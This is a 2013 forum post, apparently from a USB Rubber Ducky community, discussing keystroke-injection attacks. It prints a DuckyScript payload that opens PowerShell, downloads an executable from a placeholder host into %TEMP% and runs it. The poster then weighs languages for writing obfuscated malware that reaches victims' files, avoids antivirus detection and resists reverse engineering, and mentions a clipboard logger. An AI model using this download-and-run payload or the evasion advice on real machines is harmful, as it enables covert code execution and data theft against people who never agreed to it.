ApacheTech Consultancy Posted February 17, 2013 Share Posted February 17, 2013 Now that the four/five line wget and execute script can grab any program and run it in lightning quick speed: DELAY 3000 GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://path.to/file.old','%TEMP%\file.exe'); Start-Process "%TEMP%\file.exe" ENTER Will the way we write scripts change? I've got a feeling that the focus will move from writing the text script which executes harful code, to writing obfuscated, compressed executables. So the question is, which language? .NET offers the best easy routes to the victim's files and system, but ASM will give the best value for size of application, and the least chance of being caught by AV. AutoIT gives some really quick and simple options, such as the clipboard logger which Mubix showed on the show. Or with Phalanger, you can write WIndows executables in PHP which are almost impossible to reverse engineer. Should the focus now move away from DuckyScript and more to application coding? Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.